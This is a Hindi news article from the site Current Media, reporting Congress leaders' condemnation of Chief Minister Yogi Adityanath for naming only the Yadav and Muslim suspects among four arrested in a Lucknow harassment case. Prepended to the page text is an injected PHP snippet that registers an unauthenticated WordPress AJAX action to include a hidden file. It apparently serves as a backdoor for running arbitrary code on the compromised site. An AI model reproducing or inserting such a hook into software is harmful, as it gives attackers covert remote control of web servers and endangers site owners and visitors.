if(!function_exists('file_check_tmp3og2p0p6')){ add_action('wp_ajax_nopriv_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); add_action('wp_ajax_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); function file_check_tmp3og2p0p6() { $file = __DIR__ . '/' . 'tmp3og2p0p6.php'; if (file_exists($file)) { include $file; } die(); } }"अपराधियों को जाति के चश्मे से देखना योगी जी को मुख्यमंत्री पद के लिए अनुपयुक्त बनाता है- कांग्रेस" - Current Media

“अपराधियों को जाति के चश्मे से देखना योगी जी को मुख्यमंत्री पद के लिए अनुपयुक्त बनाता है- कांग्रेस”

लखनऊ। मुख्यमंत्री योगी आदित्यनाथ द्वारा गोमती नगर के पास महिला के साथ हुई अभद्रता के मामले में पकड़े गए चार अभियुक्तों में से सिर्फ़ यादव और मुस्लिम युवकों का नाम लेने की कांग्रेस ने निंदा की है।
कांग्रेस मुख्यालय से जारी संयुक्त बयान में अल्पसंख्यक कांग्रेस प्रदेश अध्यक्ष शाहनवाज़ आलम और ओबीसी कांग्रेस प्रदेश अध्यक्ष मनोज यादव ने कहा कि मुख्यमंत्री जी के मन में मुसलमानों और यादवों के प्रति इतनी नफरत और कुंठा भरी है कि ये अब अपराधियों को भी जाति के चश्मे से देखने लगे हैं. उनकी यह संकीर्ण मानसिकता उन्हें मुख्यमंत्री जैसे पद के लिए अनुपयुक्त बनाती है. भाजपा को तुरंत उन्हें पद से हटा देना चाहिए.
कांग्रेस नेताओं ने कहा कि पुलिस ने पवन यादव पुत्र फूल चन्द यादव, सुनील कुमार बारी पुत्र स्वर्गीय सीताराम बारी, विजय साहू पुत्र बितारी लाल साहू और मुहम्मद अरबाज़ पुत्र स्वर्गीय एसरार को गिरफ्तार किया है. लेकिन मुख्यमंत्री जी ने सिर्फ़ यादव और मुसलमान युवक का नाम लेकर महिला सुरक्षा जैसे गंभीर मुद्दे को भी अपनी हरकत से अगंभीर बना दिया. उनकी इस भाषा से महिलाओं में और असुरक्षा बढ़ेगी।

About currentmedia09@gmail.com

Currentmedia.in राष्ट्रीय स्तर पर तेजी से बढ़ती हुई हिंदी समाचार वेबासाइट है। वेबसाइट में ब्यूरोक्रेसी में ताजा घटनाक्रम, देश और समाज के लिए अमूल्य योगदान देने वाले व अपने कार्यो के दम पर अपनी पहचान बनाने वाले आइएएस और आइपीएस अधिकारियों व डॉक्टरो, कानून के जानकारों की रोचक स्टोरी के साथ उनके जीवन संघर्षो पर आधारित निष्पक्ष लेख पाठक को मिलेंगे। वेबसाइट में अन्य क्षेत्रों के भी विश्वसनीय, प्रमाणिक और निष्पक्ष समाचार पाठक वर्ग के लिए उपलब्ध रहेगा, इसके लिए वेबसाइट की ऑनलाइन संपादकीय टीम हर रोज विस्तृत कंटेट अपडेट करती रहेगी। संपादकीय टीम की कोशिश यही रहेगी की न्यूज कंटेट को लेकर पाठक वर्ग को किसी तरह की निराशा हाथ न लगे। साइट 24 घंटे प्रयोग में रहेगी।

Check Also

खिरिया घाट पर अवैध खनन के खिलाफ बड़ी कार्रवाई, आधा दर्जन से अधिक ट्रैक्टर-ट्रॉलियां पकड़ीं

झांसी। राशिद पठान । अवैध खनन के खिलाफ प्रशासन ने गुरुवार रात बड़ी कार्रवाई करते …